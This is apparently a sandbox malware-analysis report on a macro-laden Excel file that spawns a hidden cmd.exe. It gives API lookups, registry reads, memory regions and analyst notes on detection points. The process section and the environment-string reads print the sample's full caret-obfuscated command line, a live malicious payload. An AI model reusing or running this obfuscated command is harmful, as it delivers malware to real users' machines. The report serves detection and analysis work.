Get Address Unknown module name function = VarDateFromUdate, address_out = 0x7feffd85c90 True 1
Fn
Get Address Unknown module name function = VarUdateFromDate, address_out = 0x7feffd86330 True 1
Fn
Get Address Unknown module name function = GetAltMonthNames, address_out = 0x7feffda66c0 True 1
Fn
Get Address Unknown module name function = VarNumFromParseNum, address_out = 0x7feffd84710 True 1
Fn
Get Address Unknown module name function = VarParseNumFromStr, address_out = 0x7feffd848f0 True 1
Fn
Get Address Unknown module name function = VarDecFromR4, address_out = 0x7feffdbb640 True 1
Fn
Get Address Unknown module name function = VarDecFromR8, address_out = 0x7feffdbb360 True 1
Fn
Get Address Unknown module name function = VarDecFromDate, address_out = 0x7feffdc2640 True 1
Fn
Get Address Unknown module name function = VarDecFromI4, address_out = 0x7feffda58a0 True 1
Fn
Get Address Unknown module name function = VarDecFromCy, address_out = 0x7feffda5820 True 1
Fn
Get Address Unknown module name function = VarR4FromDec, address_out = 0x7feffdbaf20 True 1
Fn
Get Address Unknown module name function = GetRecordInfoFromTypeInfo, address_out = 0x7feffdda0c0 True 1
Fn
Get Address Unknown module name function = GetRecordInfoFromGuids, address_out = 0x7feffe12160 True 1
Fn
Get Address Unknown module name function = SafeArrayGetRecordInfo, address_out = 0x7feffda5af0 True 1
Fn
Get Address Unknown module name function = SafeArraySetRecordInfo, address_out = 0x7feffda5a90 True 1
Fn
Get Address Unknown module name function = SafeArrayGetIID, address_out = 0x7feffda5a60 True 1
Fn
Get Address Unknown module name function = SafeArraySetIID, address_out = 0x7feffda5a30 True 1
Fn
Get Address Unknown module name function = SafeArrayCopyData, address_out = 0x7feffd860b0 True 1
Fn
Get Address Unknown module name function = SafeArrayAllocDescriptorEx, address_out = 0x7feffd83e90 True 1
Fn
Get Address Unknown module name function = SafeArrayCreateEx, address_out = 0x7feffdd9f80 True 1
Fn
Get Address Unknown module name function = VarFormat, address_out = 0x7feffe09b20 True 1
Fn
Get Address Unknown module name function = VarFormatDateTime, address_out = 0x7feffe09aa0 True 1
Fn
Get Address Unknown module name function = VarFormatNumber, address_out = 0x7feffe09990 True 1
Fn
Get Address Unknown module name function = VarFormatPercent, address_out = 0x7feffe09890 True 1
Fn
Get Address Unknown module name function = VarFormatCurrency, address_out = 0x7feffe09770 True 1
Fn
Get Address Unknown module name function = VarWeekdayName, address_out = 0x7feffdeb8d0 True 1
Fn
Get Address Unknown module name function = VarMonthName, address_out = 0x7feffdeb800 True 1
Fn
Get Address Unknown module name function = VarAdd, address_out = 0x7feffe048e0 True 1
Fn
Get Address Unknown module name function = VarAnd, address_out = 0x7feffe09470 True 1
Fn
Get Address Unknown module name function = VarCat, address_out = 0x7feffe096a0 True 1
Fn
Get Address Unknown module name function = VarDiv, address_out = 0x7feffe02fe0 True 1
Fn
Get Address Unknown module name function = VarEqv, address_out = 0x7feffe09cf0 True 1
Fn
Get Address Unknown module name function = VarIdiv, address_out = 0x7feffe08ff0 True 1
Fn
Get Address Unknown module name function = VarImp, address_out = 0x7feffe09c00 True 1
Fn
Get Address Unknown module name function = VarMod, address_out = 0x7feffe08e60 True 1
Fn
Get Address Unknown module name function = VarMul, address_out = 0x7feffe03690 True 1
Fn
Get Address Unknown module name function = VarOr, address_out = 0x7feffe092d0 True 1
Fn
Get Address Unknown module name function = VarPow, address_out = 0x7feffe02e80 True 1
Fn
Get Address Unknown module name function = VarSub, address_out = 0x7feffe03f90 True 1
Fn
Get Address Unknown module name function = VarXor, address_out = 0x7feffe091a0 True 1
Fn
Get Address Unknown module name function = VarAbs, address_out = 0x7feffde7c30 True 1
Fn
Get Address Unknown module name function = VarFix, address_out = 0x7feffde7a60 True 1
Fn
Get Address Unknown module name function = VarInt, address_out = 0x7feffde7890 True 1
Fn
Get Address Unknown module name function = VarNeg, address_out = 0x7feffde7ea0 True 1
Fn
Get Address Unknown module name function = VarNot, address_out = 0x7feffe09600 True 1
Fn
Get Address Unknown module name function = VarRound, address_out = 0x7feffde76a0 True 1
Fn
Get Address Unknown module name function = VarCmp, address_out = 0x7feffe083f0 True 1
Fn
Get Address Unknown module name function = VarDecAdd, address_out = 0x7feffdb3070 True 1
Fn
Get Address Unknown module name function = VarDecCmp, address_out = 0x7feffdbd700 True 1
Fn
Get Address Unknown module name function = VarBstrCat, address_out = 0x7feffdbd890 True 1
Fn
Get Address Unknown module name function = VarCyMulI4, address_out = 0x7feffd9caf0 True 1
Fn
Get Address Unknown module name function = VarBstrCmp, address_out = 0x7feffda8a00 True 1
Fn
Get Address Unknown module name address_out = 0x7fee5a4fcd0 True 1
Fn
Get Address Unknown module name address_out = 0x0 False 1
Fn
Get Address Unknown module name function = 600, address_out = 0x7fee5de4ee0 True 3
Fn
Window (1)
»
Operation Window Name Additional Information Success Count Logfile
Create - class_name = ThunderMain, wndproc_parameter = 0 True 1
Fn
Keyboard (62)
»
Operation Additional Information Success Count Logfile
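Read virtual_key_code = VK_ESCAPE, result_out = 0 True 62
Fn
Note: these reads come from the Excel host process and always return 0. Repeated polling of the Escape key is most likely the VBA runtime checking for a user break while the macro runs. Taken alone it does not indicate keystroke capture.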
System (21)
»
Operation Additional Information Success Count Logfile
Get Cursor x_out = 555, y_out = 565 True 1
Fn
Get Cursor x_out = 723, y_out = 490 True 1
Fn
Get Cursor x_out = 1072, y_out = 125 True 1
Fn
Get Time type = System Time, time = 2018-11-06 10:24:02 (UTC) True 1
Fn
Get Time type = Ticks, time = 127749 True 1
Fn
Get Time type = Local Time, time = 2018-11-06 10:24:03 (Local Time) True 4
Fn
Get Time type = Local Time, time = 2018-11-06 10:24:07 (Local Time) True 1
Fn
Get Time type = Ticks, time = 312548 True 7
Fn
Get Info type = Operating System True 2
Fn
Get Info type = Operating System True 2
Fn
Environment (1)
»
Operation Additional Information Success Count Logfile
Get Environment String name = DDRYBUR False 1
Fn
Process #3: cmd.exe
119 0
»
Information Value
ID #3
File Name c:\windows\system32\cmd.exe
Command Line CMD.Exe /c ^F^o^r ; /^f ;; " tokens= +2 delims=FeH" , %^1,; iN , ( , ', , ^^f^^t^^Yp^^e ;^|;^^f^^IN^^d , ;, "SHCm" , , ; ' ; , ) , , ,^d^O ,%^1, ; ; ; pPuxarv^/^VC^s^v^4^0^b^l^b^kn^ ^ ^ , cw8f/^r ", ( , ; , ; ,( , ; , ;,;, (s^e^T^ ^ ^ ^ ^ ^+^~^}{=^e^o^2^8^P^G^C^7^y.Y^.^Y^e^o^2^v^T^d^]^F^3^p^b^f^6^K^'^.^Y^1^.^Y^@eo^2^h^8^P^Z^7^y8^P^3^p^T^d^e^3^7^{^j^Un^P^jy+^@^e^o^2^%^z^w^L^h^wLT^d^3p^e^3^7^{^j^Un^#^P^j^y^+^2^X^b^2^)^.^Y^1^1^2^eo^2^2^+^26^3^p^.^Y^F3^p^2^+^2^]^2^+^2^.^Y^q^F^3^p^b^fN^2^+^2^8^P^4^-^P^j^3^Q^e^A^C^h^8^P^Z^8^P^,2^+^2^GC^7^y^2^+^2^[2^+^2^7^K^2^+^2^3^7^37^-^%^2^+^2^`k^7^y^8^P^.^Y^-7^K^e^o2^2^+^2^eo^2^8^Pm3^Qe^AC^3^p`^2^+2^q^F^3^p^bfN^6^m^8^P^.^Y^A^C^6^7^j^h`^e^o^2^G^C^7^y^8^P^m^'^j^U^]^6^2^+^2^4^2^+^2^Zn^.^AC^6^7^[^2^+^2^F^3^p^bf^b^f^k7y^u^u^Q^e^3^7^e^o^2^2+^2^6^K^F^3^p^]^.Y^j^h`^e^o^2^G^C^7^y^8^P^2^+^2^m^'^2^+^2^j^U^]^6^4^Zn^2^+2^.^'^u^2^+^2^Z^G^C^7^y^m^6^k^7^y^1^1F^3^p^]^.^Y^q^F^3^p^b^fN^8^P^G^C^7^y'a^2^+^2^8^P^3^QeA^C^7^y^j^U6^2^+2^3p^Z8^Pn^G^C7^y^)^'^2^+^2Pj^k^7^y^8^Pn^R^8^P^6^3^7^1^A^C6^2^+^2^7^2^+^2^%^z^w^LhG^C^7y^G^C7^y^k^7^y^e^o^2^8^ ^,^.^,.^Z^m^6.^2+^2^8^P^e^o^2^4ax^'^Zm^.^3^Q^e^AC^X2^+^2^7^'^,^X^2^+2^m^,^.^A^C^ ^,^.^F3^p^j^Un^,^.^2^+^2^.^6^G^C^7^y4^a^x^u^Q^e^7^y^e^o2^K_^X^'^2^+^2^k^7^yn^.^A^C^6^7^2^+2^)^)^[^2^+^2^F3^p^b^f^b^f^k^7^y^u^u^Q^e^2^+^2m^Q^e^6^KF^3^p^]^.^Y^u^`2^+^2^G^C^7y^2+^2^8^P^{^Pjy^.^Y^2^+^2^4^a^xj^Un^H^ ^[1^ ^'^2^+^2^'^H^)^3^Q^e^A^C^2^+^2^j^h^2^+^2^h^8^PZo^\^F^3^p^X^]^8^P^6^,^%^z^w^Lh^1^2^+^2^F^3^p^b^f^2^+^2^b^f^2^+^2k^7^y^uu^Q^e^7^.Y^Zn^1^ ^'^'^H^2^+^2^4^a^x^(^2^+^2^)^)\^F^3pb^f^b^f^k^7^yu^u^Q^e^2^+^2G^C^7^y^2^+^2^G^C^7^y^6^K^F^3^p^b^fb^f^k^7^y^u^u^Q^e^3^7e^o^2^'^6^wL^8^P^2^+^2^G^C^7^y^G^C^7^yy^Z^7^8^P^3p^1^F^3pb^fb^f^k^7^y^u^u^Q^e^7^6^x^d^2^+^2^F^3^p^b^f^2^+^2^b^f^k^7^y^uu^Q^e_^2^+^2^)[^F^3^p^bf^b^f^k^7^y^u^u^Q^e^m^Qe^2^+^2^{F^3^p^b^f^b^f^k^7^yu^u^Q^e^2+^2^_^:^H^4^a^x^i^y+^F^3^p^bf^b^f^k^7^y^u^u^Qe^7P^jy^6K^1^{^m^6^G^C7y^%^z^w^L^h^P^j^y^8^ ^8^ 
z^w^L^h^2^+^2^3^p^X^2^+^2^X^]^1^1^F^3pb^f^b^f^2^+^2^k^7^y^u^uQ^e^G^C^7^y^G^C^7^y^'^u^-^3^Q^e^A^C^6n^3^7^j^Un^5^)^:^j^Unb^f^)-^3^Qe^AC^X^]^2^+2^1^F^3^p^b^f^b^f^k^7^y^u^uQ^e^G^C^7^y2^+2^G^C^7^y^'^6^w^L^.^Y^-^3^Q^e^A^C^6n^37^.Y^j^Un^5^)^)^}^2^+^2^}[^2^+2^e^2^+^2^w^L^Xb^1^2^+^2^{^jh^`^e^o2G^C7^y^2^+2^8^P^m^'^%^8^P^7^2^+^2G^C^7^y^'^w^L2^+^2n^,^X^3^7Zn^2^+^2^.^2^+^2^Pjy^8^ ^8^ ^7^Kj^h^7^y^j^U^6^ee^'^2^+^2^6^w^L8^P^G^C^7^y^j^h^2+^2GC^7^y^]^Zn^.^1^F3^p^b^f^b^f2^+^2^k^7^y^u^u^Q^e^2^+^2m^Q^e^{^ ^'^2^+^2^'^2+^2^j^Un^2^+^2^A^C^ ^(2^+^2^P^j^y^)2^+^2^)^2^)^'^R^8^P^k^7^y3p^6^7^y^j^U^6w^L^1^2^A^C^6^7^2^6^x^d^{^e^o^2^%^R^en^6^w^L^P^jy^{^7^y^j^U^6^%^z^w^Lh^7^K^]^P^j^y^#^H^)^'^R8^Pk^7^y^3^p^6^7^y^j^U^6^w^L^1^1^{^7y^j^U^6^%^z^w^Lh^7^K^]^P^j^y^A^Ci^y^+^{^7^y^j^U^6^%^zw^L^h7^K]P^j^yi^y^#+^{^7^y^j^U^6^%z^w^L^h7^K^]^P^jy^j^Un^ ^b^f^)^6^x^d^{^e^o^2^%R^en6w^L^P^j^y^{^7^y^jU^6^%^z^w^L^h^7^K^]P^j^y^jUn^4^a^x^H^)^'^R^8P^k^7^y^3p^6^7^y^j^U^6^wL1^1^{^7^y^j^U^6^%^z^w^L^h^7^K^]^P^j^y^j^Un^j^Un^i^y^+{^7y^j^U6^%^z^w^L^h^7^K^]^P^j^y^5^H^+^{7y^j^U^6^%^z^w^L^h^7^K^]^Pjy^i^y^j^Un^)^6x^d^{^e^o^2^%^R^en^6^w^L^P^j^y^{^7^y^j^U6^%^z^wL^h^7^K^]^P^jy^#^bf^)^)^^^&^^^&^.^Y^e^o^28^P^%.^Y^.^Y^6^j^U^e/`^6^K^w^L^,^%^zw^L^h^Pj^.^Y^1^.^Z^.^Y^F^3p^b^f^6^Re^7^K^3^Q^e^A^C^3^p^8^P^8^ ^8^P^:^X^b^G^C7^y^)^'^7y6^T^d^vw^L^'^enF^3p^b^f^P^j^Q^e^wL7^y^j^U^6^X^m^u^Q^e^6n^jU^'^eq^F^3p^b^fN^7^y^P^j^Q^e^8^P^e^o^2^7^yj^U^6^R^Z^G^C^7^y^y^%^1^1T^d^j^h^.^Y^8^P^qF^3^pb^fN^7^y^8 ^e^o^2^3^T^d^]^7^y^)^'^F^3^pb^f^6^Td^3^8P.^Y^.^Y^)^.^Y.^Y^^^^^^^|^G^C7^y^y^P^j^4^w^L^R^e^o^2^h8^P^Z7^y^w^L^3^p^T^d^.^Y^.^Y^-n^X^q^F^3^p^b^fN^Z^q^F^3^p^b^fN^%^w^L^]^6^7^y^j^U^6^%^e^.^Y^.^Y^-^q^F^3^p^b^fNX^3^p^P^j^.Y^-^4^Z^qF^3^p^b^fN^.^Y^%^z^w^Lh^e^3^7^3^78^Pn^.^Y^-^8^P^7^8^P^,^v^%e^P^j^q^F^3^pb^fN^k^7^y^P^jT^d^e,^.^Y^3^Q^e^A^C^`^GC^7^yy^7K^j^h^j^h^.^Y^.^Y^-n^P^j^G^C^7^y^y^]P^jz^w^Lh^e^3^p^8^P^.Y^.^Y^-^7^y^j^U^6P^j^m^u^Q^e^7^K^q^F^3^pb^fN^3^7^.^Y^.^Y.Y^.^Y^.^Y^^^^^^^^^^^^^^^&^1^.^Y^@^8^P^q^F^3^p^b^fN^7^y^8^ 
^7^y^j^U6X^m^e^o^2^G^C^7^y^y^8^P^,^{^H^6^x^d^4^a^xH^6^x^d^4^a^x^5^P^j^y^-^Td^Q^X^en^22^)^1^@^Zn^k7y^v^%^.^Y^)^.^Y^.^Y^^^&^^^&^.^Y^.^Y^,^m3^7^'^8^P^7^w^L.^Y^.^Y^.^Y^,^.^,^.^Y^o^63^7^Z^/^T^.^o) , ) ; ; ; )&( ; ( ; ; ; (^S^e^t ^\^,^}_=^!^+^~^}^{^:A^C^=^9^!) ; ; ; ) )&& ( , (, (^s^e^T ^ ^ ^ ^`^?=^!^\^,^}^_^:^e^o^2^=^s^!) , , ) ; ; )&&( , ( ; ; (S^e^T ^ ^@^[^~=!^`^?:^e^=^I^!) , ) , )&( , , , (^S^e^T ^ ^ ^ ^@^+^*=^!^@^[^~^:^.^=^g^!) , )&& ( (s^E^T ^ ^[^{=^!^@^+^*^:^8^P^=e^!), )& ( ; ; ; (^S^e^T ^ ^{^@^}=^!^[^{^:'^=.^!), , , )& ( ; (^s^E^t ^ ^\^{=^!^{^@^}^:^2^=^'^!) , )&& ( , ; , ( , ; , ; , (^s^E^T ^}^]^,^$=^!^\^{^:^a^=^W^!) , ) , , )&& (^s^e^T ^\^[=^!^}^]^,^$^:^6^=^a^!)&& ( ( ; ; ; (s^e^t ^ ^ ^`^]^$=^!^\^[^:^4^W^x^=^2^!) ) )&& ( , ; , ;, (^S^e^T ^ ^ ^`^-^$=!^`^]^$:bf=^6!) , ; , ; , )& ( ,(,;,; , (^s^ET ^ ^ [^$^@^+=^!^`^-^$^:^7^K^=^A^!) , ) , ;, )& ( , (^S^e^t ^@^-=^!^[^$^@^+:^3^p=^l^!) ; ; ; )& (^S^et ^ ^ ^ ^~^`^*^?=^!^@^-^:^:^=^*^!)&&( , , (^s^e^t ^#^;=^!^~^`^*^?^:^w^L^=^E^!) ,; , ; , )& ( ( , , (^s^e^T ^ ^*^{^[=^!^#^;:^ ^=^0^!) , ) )& (^s^et ^ ^@^#^?^.=^!^*^{^[^:^g^Y^=^ ^!)&( , ( , , (^S^E^T ^ ^'^}^_^-=^!^@^#^?^.^:^8^0^=^:^!) ; ; ) )
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:37, Reason: Child Process
Unmonitor End Time: 00:02:06, Reason: Self Terminated
Monitor Duration 00:00:29
OS Process Information
»
Information Value
PID 0xac0
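Parent PID 0x8f8 (c:\program files\microsoft office\root\office16\excel.exe)
Note: the parent is the Office application itself, and the process-creation record for this PID (os_pid = 0xac0) shows show_window = SW_HIDE. An Office process starting cmd.exe with a hidden window and a heavily caret-escaped command line is the most durable detection point visible in this report.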
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0xAC4
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory r True False False -
locale.nls 0x00050000 0x000b6fff Memory Mapped File r False False False -
pagefile_0x00000000000c0000 0x000c0000 0x000c6fff Pagefile Backed Memory r True False False -
pagefile_0x00000000000d0000 0x000d0000 0x000d1fff Pagefile Backed Memory rw True False False -
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory rw True False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory rw True False False -
private_0x0000000000130000 0x00130000 0x0022ffff Private Memory rw True False False -
private_0x0000000000230000 0x00230000 0x0032ffff Private Memory rw True False False -
private_0x0000000000360000 0x00360000 0x0045ffff Private Memory rw True False False -
pagefile_0x0000000000460000 0x00460000 0x005e7fff Pagefile Backed Memory r True False False -
private_0x0000000000600000 0x00600000 0x0060ffff Private Memory rw True False False -
pagefile_0x0000000000610000 0x00610000 0x00790fff Pagefile Backed Memory r True False False -
pagefile_0x00000000007a0000 0x007a0000 0x01b9ffff Pagefile Backed Memory r True False False -
pagefile_0x0000000001ba0000 0x01ba0000 0x01ee2fff Pagefile Backed Memory r True False False -
sortdefault.nls 0x01ef0000 0x021befff Memory Mapped File r False False False -
cmd.exe 0x4a0b0000 0x4a108fff Memory Mapped File rwx True False False -
user32.dll 0x77a20000 0x77b19fff Memory Mapped File rwx False False False -
kernel32.dll 0x77b20000 0x77c3efff Memory Mapped File rwx False False False -
ntdll.dll 0x77c40000 0x77de8fff Memory Mapped File rwx False False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory r True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory r True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory r True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
winbrand.dll 0x7fef59a0000 0x7fef59a7fff Memory Mapped File rwx False False False -
kernelbase.dll 0x7fefdd60000 0x7fefddcafff Memory Mapped File rwx False False False -
gdi32.dll 0x7fefdf60000 0x7fefdfc6fff Memory Mapped File rwx False False False -
imm32.dll 0x7fefed60000 0x7fefed8dfff Memory Mapped File rwx False False False -
msctf.dll 0x7feff1e0000 0x7feff2e8fff Memory Mapped File rwx False False False -
usp10.dll 0x7feff4d0000 0x7feff598fff Memory Mapped File rwx False False False -
msvcrt.dll 0x7feff5a0000 0x7feff63efff Memory Mapped File rwx False False False -
lpk.dll 0x7feff860000 0x7feff86dfff Memory Mapped File rwx False False False -
apisetschema.dll 0x7fefff60000 0x7fefff60fff Memory Mapped File rwx False False False -
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory r True False False -
private_0x000007fffffda000 0x7fffffda000 0x7fffffdafff Private Memory rw True False False -
private_0x000007fffffde000 0x7fffffde000 0x7fffffdffff Private Memory rw True False False -
Host Behavior
File (35)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\aETAdzjz\Desktop type = file_attributes True 2
Fn
Get Info STD_OUTPUT_HANDLE type = file_type True 5
Fn
Open STD_OUTPUT_HANDLE - True 20
Fn
Open STD_INPUT_HANDLE - True 3
Fn
Write STD_OUTPUT_HANDLE size = 2 True 2
Fn
Data
Write STD_OUTPUT_HANDLE size = 26 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 3 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 7988 True 1
Fn
Data
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 24, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
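Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Note: on rows with Success = False and type = REG_NONE the read failed, so the "data" field is not a registry value. It appears to repeat the result of the preceding successful read. This row therefore does not show an AutoRun command configured under Command Processor; the same applies to the failed DisableUNCCheck and DelayedExpansion reads in both hives.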
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (2)
»
Operation Process Additional Information Success Count Logfile
Create cmd.exe - True 1
Fn
Create C:\Windows\system32\cmd.exe os_pid = 0xb04, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x4a0b0000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x77b20000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\CMD.Exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x77b36d40 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x77b323d0 True 1
Fn
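Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x77b28290 True 1
Fn
Note: the four kernel32 lookups in this table (SetThreadUILanguage, CopyFileExW, IsDebuggerPresent, SetConsoleInputExeNameW) look like cmd.exe's own start-up resolution rather than anything driven by the sample's command line. The IsDebuggerPresent entry should not be read as anti-debugging evidence without corroboration.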
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x77b317e0 True 1
Fn
System (2)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2018-11-06 10:24:11 (UTC) True 1
Fn
Get Time type = Ticks, time = 136781 True 1
Fn
Environment (53)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 7
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 2
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Fn
Get Environment String name = PROMPT False 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Get Environment String name = ^1,; iN , ( , ', , ^^f^^t^^Yp^^e ;^|;^^f^^IN^^d , ;, "SHCm" , , ; ' ; , ) , , ,^d^O , False 1
Fn
Get Environment String name = ^1, ; ; ; pPuxarv^/^VC^s^v^4^0^b^l^b^kn^ ^ ^ , cw8f/^r ", ( , ; , ; ,( , ; , ;,;, (s^e^T^ ^ ^ ^ ^ ^+^~^}{=^e^o^2^8^P^G^C^7^y.Y^.^Y^e^o^2^v^T^d^]^F^3^p^b^f^6^K^'^.^Y^1^.^Y^@eo^2^h^8^P^Z^7^y8^P^3^p^T^d^e^3^7^{^j^Un^P^jy+^@^e^o^2^ False 1
Fn
Get Environment String name = ^z^w^L^h^wLT^d^3p^e^3^7^{^j^Un^#^P^j^y^+^2^X^b^2^)^.^Y^1^1^2^eo^2^2^+^26^3^p^.^Y^F3^p^2^+^2^]^2^+^2^.^Y^q^F^3^p^b^fN^2^+^2^8^P^4^-^P^j^3^Q^e^A^C^h^8^P^Z^8^P^,2^+^2^GC^7^y^2^+^2^[2^+^2^7^K^2^+^2^3^7^37^-^ False 1
Fn
Get Environment String name = ^2^+^2^`k^7^y^8^P^.^Y^-7^K^e^o2^2^+^2^eo^2^8^Pm3^Qe^AC^3^p`^2^+2^q^F^3^p^bfN^6^m^8^P^.^Y^A^C^6^7^j^h`^e^o^2^G^C^7^y^8^P^m^'^j^U^]^6^2^+^2^4^2^+^2^Zn^.^AC^6^7^[^2^+^2^F^3^p^bf^b^f^k7y^u^u^Q^e^3^7^e^o^2^2+^2^6^K^F^3^p^]^.Y^j^h`^e^o^2^G^C^7^y^8^P^2^+^2^m^'^2^+^2^j^U^]^6^4^Zn^2^+2^.^'^u^2^+^2^Z^G^C^7^y^m^6^k^7^y^1^1F^3^p^]^.^Y^q^F^3^p^b^fN^8^P^G^C^7^y'a^2^+^2^8^P^3^QeA^C^7^y^j^U6^2^+2^3p^Z8^Pn^G^C7^y^)^'^2^+^2Pj^k^7^y^8^Pn^R^8^P^6^3^7^1^A^C6^2^+^2^7^2^+^2^ False 1
Fn
Get Environment String name = ^z^w^LhG^C^7y^G^C7^y^k^7^y^e^o^2^8^ ^,^.^,.^Z^m^6.^2+^2^8^P^e^o^2^4ax^'^Zm^.^3^Q^e^AC^X2^+^2^7^'^,^X^2^+2^m^,^.^A^C^ ^,^.^F3^p^j^Un^,^.^2^+^2^.^6^G^C^7^y4^a^x^u^Q^e^7^y^e^o2^K_^X^'^2^+^2^k^7^yn^.^A^C^6^7^2^+2^)^)^[^2^+^2^F3^p^b^f^b^f^k^7^y^u^u^Q^e^2^+^2m^Q^e^6^KF^3^p^]^.^Y^u^`2^+^2^G^C^7y^2+^2^8^P^{^Pjy^.^Y^2^+^2^4^a^xj^Un^H^ ^[1^ ^'^2^+^2^'^H^)^3^Q^e^A^C^2^+^2^j^h^2^+^2^h^8^PZo^\^F^3^p^X^]^8^P^6^,^ False 1
Fn
Get Environment String name = ^z^w^Lh^1^2^+^2^F^3^p^b^f^2^+^2^b^f^2^+^2k^7^y^uu^Q^e^7^.Y^Zn^1^ ^'^'^H^2^+^2^4^a^x^(^2^+^2^)^)\^F^3pb^f^b^f^k^7^yu^u^Q^e^2^+^2G^C^7^y^2^+^2^G^C^7^y^6^K^F^3^p^b^fb^f^k^7^y^u^u^Q^e^3^7e^o^2^'^6^wL^8^P^2^+^2^G^C^7^y^G^C^7^yy^Z^7^8^P^3p^1^F^3pb^fb^f^k^7^y^u^u^Q^e^7^6^x^d^2^+^2^F^3^p^b^f^2^+^2^b^f^k^7^y^uu^Q^e_^2^+^2^)[^F^3^p^bf^b^f^k^7^y^u^u^Q^e^m^Qe^2^+^2^{F^3^p^b^f^b^f^k^7^yu^u^Q^e^2+^2^_^ False 1
Fn
Get Environment String name = ^z^w^L^h^P^j^y^8^ ^8^ z^w^L^h^2^+^2^3^p^X^2^+^2^X^]^1^1^F^3pb^f^b^f^2^+^2^k^7^y^u^uQ^e^G^C^7^y^G^C^7^y^'^u^-^3^Q^e^A^C^6n^3^7^j^Un^5^)^ False 1
Fn
